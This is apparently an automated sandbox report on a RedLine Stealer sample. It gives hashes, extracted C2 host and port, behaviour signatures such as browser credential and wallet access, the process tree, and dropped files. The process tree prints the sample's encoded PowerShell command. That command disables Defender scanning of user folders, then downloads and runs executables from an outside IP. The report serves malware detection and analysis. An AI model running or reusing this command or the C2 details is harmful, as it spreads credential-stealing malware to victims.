Resubmissions
19-08-2022 18:19
220819-wx8l9aghap 1019-08-2022 18:17
220819-wwzyqagghn 1019-08-2022 18:15
220819-wvz74abea4 10Analysis
-
max time kernel
55s -
max time network
60s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
19-08-2022 18:17
Static task
static1
General
-
Target
1111.exe
-
Size
6KB
-
MD5
cad36ced89b961355a57fc8acedfe557
-
SHA1
5b020db088ef17cebb57ba77fd9427414d292f36
-
SHA256
08b2434fa33b35c428fb85e938fed0d6d715b5e46806bbe2d130ebb0ed2df614
-
SHA512
760c977a6835479956d8f1f74dd3f6d10557bb66c57d990243a4fa94d4d5845ad9b31d069660702aab40adceed5525e3c65613663ee442899fa43005b4bf52db
Malware Config
Extracted
redline
1877
overthinker1877.duckdns.org:60732
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\svchosts.exe family_redline C:\Users\Admin\AppData\Local\Temp\svchosts.exe family_redline behavioral1/memory/2364-158-0x0000000000010000-0x0000000000048000-memory.dmp family_redline -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 11 5040 powershell.exe 25 5040 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
svchosts.exesvchost.exepid process 2364 svchosts.exe 4284 svchost.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
1111.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation 1111.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exesvchosts.exepid process 5040 powershell.exe 5040 powershell.exe 2364 svchosts.exe 2364 svchosts.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exesvchosts.exedescription pid process Token: SeDebugPrivilege 5040 powershell.exe Token: SeDebugPrivilege 2364 svchosts.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
1111.exepowershell.exedescription pid process target process PID 2428 wrote to memory of 5040 2428 1111.exe powershell.exe PID 2428 wrote to memory of 5040 2428 1111.exe powershell.exe PID 2428 wrote to memory of 5040 2428 1111.exe powershell.exe PID 5040 wrote to memory of 2364 5040 powershell.exe svchosts.exe PID 5040 wrote to memory of 2364 5040 powershell.exe svchosts.exe PID 5040 wrote to memory of 2364 5040 powershell.exe svchosts.exe PID 5040 wrote to memory of 4284 5040 powershell.exe svchost.exe PID 5040 wrote to memory of 4284 5040 powershell.exe svchost.exe PID 5040 wrote to memory of 4284 5040 powershell.exe svchost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1111.exe"C:\Users\Admin\AppData\Local\Temp\1111.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYwBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdwB0AHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABwAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBpAHQAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADMALgA5ADAALgAxADIAOAAuADIANQAzAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHMAdgBzAGgAbwBzAHQAcwAuAGUAeABlACcALAAgADwAIwB5AGcAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHEAYQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHAAbQB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHMAdgBzAGgAbwBzAHQAcwAuAGUAeABlACcAKQApADwAIwBmAG0AawAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQAzAC4AOQAwAC4AMQAyADgALgAyADUAMwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBzAHYAYwBoAG8AcwB0AHMALgBlAHgAZQAnACwAIAA8ACMAdwBoAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAGkAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBuAG4AZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHYAYwBoAG8AcwB0AHMALgBlAHgAZQAnACkAKQA8ACMAYwBoAG4AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAMwAuADkAMAAuADEAMgA4AC4AMgA1ADMALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AcwB2AGMAaABvAHMAdAAuAGUAeABlACcALAAgADwAIwB0AHAAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGEAdAB4ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAcQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAnACkAKQA8ACMAdQBwAGkAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZAB0AGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAG4AagB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHMAdgBzAGgAbwBzAHQAcwAuAGUAeABlACcAKQA8ACMAcwBlAHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAagBlAHQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHkAZwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHMAdgBjAGgAbwBzAHQAcwAuAGUAeABlACcAKQA8ACMAagBrAGQAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZwBjAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHgAcQBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAnACkAPAAjAGsAYgB6ACMAPgA="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\svchosts.exe"C:\Users\Admin\AppData\Local\Temp\svchosts.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"3⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeFilesize
14KB
MD51937d5a853734874a0ef18d4acc43113
SHA137c4f8d0c6fea50f836c0a308b06de910205189a
SHA25688e6238b9329ac7eca5ff20016f896c4869760a44e2da20cfd070bf83db52d64
SHA512e43cbf94a70683649ac126a68d37f0d69bb581864e5e1a6076f9a09e2a3a89f88b436d3ef41300af873ea1fc70f3fdb75fe69288bcf5c17ef100b4b802478a28
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeFilesize
14KB
MD51937d5a853734874a0ef18d4acc43113
SHA137c4f8d0c6fea50f836c0a308b06de910205189a
SHA25688e6238b9329ac7eca5ff20016f896c4869760a44e2da20cfd070bf83db52d64
SHA512e43cbf94a70683649ac126a68d37f0d69bb581864e5e1a6076f9a09e2a3a89f88b436d3ef41300af873ea1fc70f3fdb75fe69288bcf5c17ef100b4b802478a28
-
C:\Users\Admin\AppData\Local\Temp\svchosts.exeFilesize
205KB
MD5b3503746bb7f1d30755c9f4a26ce0a2c
SHA12490c2a6b3fad0711993c8bb16aab2d21cefac6f
SHA25690706da9b2d8dca13b4823cb9b6c95bde3df92ac336826722b33cfe495d2e300
SHA512142841d0e5a51212af7f7ae6cd083eb5daa2e5542f3c8294524ff8c722a4dcbe8462bf647f928ba3b3edb4d36638a4be5a83ad5762e9b8e66429f6006901b72c
-
C:\Users\Admin\AppData\Local\Temp\svchosts.exeFilesize
205KB
MD5b3503746bb7f1d30755c9f4a26ce0a2c
SHA12490c2a6b3fad0711993c8bb16aab2d21cefac6f
SHA25690706da9b2d8dca13b4823cb9b6c95bde3df92ac336826722b33cfe495d2e300
SHA512142841d0e5a51212af7f7ae6cd083eb5daa2e5542f3c8294524ff8c722a4dcbe8462bf647f928ba3b3edb4d36638a4be5a83ad5762e9b8e66429f6006901b72c
-
memory/2364-164-0x0000000005EA0000-0x0000000006062000-memory.dmpFilesize
1.8MB
-
memory/2364-163-0x0000000004B80000-0x0000000004C8A000-memory.dmpFilesize
1.0MB
-
memory/2364-162-0x00000000048D0000-0x000000000490C000-memory.dmpFilesize
240KB
-
memory/2364-161-0x0000000004870000-0x0000000004882000-memory.dmpFilesize
72KB
-
memory/2364-159-0x0000000004FB0000-0x00000000055C8000-memory.dmpFilesize
6.1MB
-
memory/2364-158-0x0000000000010000-0x0000000000048000-memory.dmpFilesize
224KB
-
memory/2364-151-0x0000000000000000-mapping.dmp
-
memory/2364-165-0x00000000065A0000-0x0000000006ACC000-memory.dmpFilesize
5.2MB
-
memory/2364-166-0x00000000061F0000-0x0000000006266000-memory.dmpFilesize
472KB
-
memory/2364-167-0x0000000006550000-0x000000000656E000-memory.dmpFilesize
120KB
-
memory/4284-160-0x0000000005BD0000-0x0000000005C62000-memory.dmpFilesize
584KB
-
memory/4284-156-0x0000000000890000-0x000000000089A000-memory.dmpFilesize
40KB
-
memory/4284-153-0x0000000000000000-mapping.dmp
-
memory/5040-141-0x0000000006F50000-0x0000000006F6E000-memory.dmpFilesize
120KB
-
memory/5040-142-0x0000000008300000-0x000000000897A000-memory.dmpFilesize
6.5MB
-
memory/5040-149-0x0000000008050000-0x0000000008072000-memory.dmpFilesize
136KB
-
memory/5040-148-0x0000000007F30000-0x0000000007F38000-memory.dmpFilesize
32KB
-
memory/5040-147-0x0000000007F40000-0x0000000007F5A000-memory.dmpFilesize
104KB
-
memory/5040-146-0x0000000007EF0000-0x0000000007EFE000-memory.dmpFilesize
56KB
-
memory/5040-145-0x0000000007F80000-0x0000000008016000-memory.dmpFilesize
600KB
-
memory/5040-144-0x0000000007D20000-0x0000000007D2A000-memory.dmpFilesize
40KB
-
memory/5040-143-0x0000000007CC0000-0x0000000007CDA000-memory.dmpFilesize
104KB
-
memory/5040-150-0x0000000008F30000-0x00000000094D4000-memory.dmpFilesize
5.6MB
-
memory/5040-132-0x0000000000000000-mapping.dmp
-
memory/5040-140-0x0000000070590000-0x00000000705DC000-memory.dmpFilesize
304KB
-
memory/5040-139-0x0000000006F70000-0x0000000006FA2000-memory.dmpFilesize
200KB
-
memory/5040-138-0x00000000069B0000-0x00000000069CE000-memory.dmpFilesize
120KB
-
memory/5040-137-0x0000000006350000-0x00000000063B6000-memory.dmpFilesize
408KB
-
memory/5040-136-0x00000000062E0000-0x0000000006346000-memory.dmpFilesize
408KB
-
memory/5040-135-0x0000000005AF0000-0x0000000005B12000-memory.dmpFilesize
136KB
-
memory/5040-134-0x0000000005B80000-0x00000000061A8000-memory.dmpFilesize
6.2MB
-
memory/5040-133-0x00000000053D0000-0x0000000005406000-memory.dmpFilesize
216KB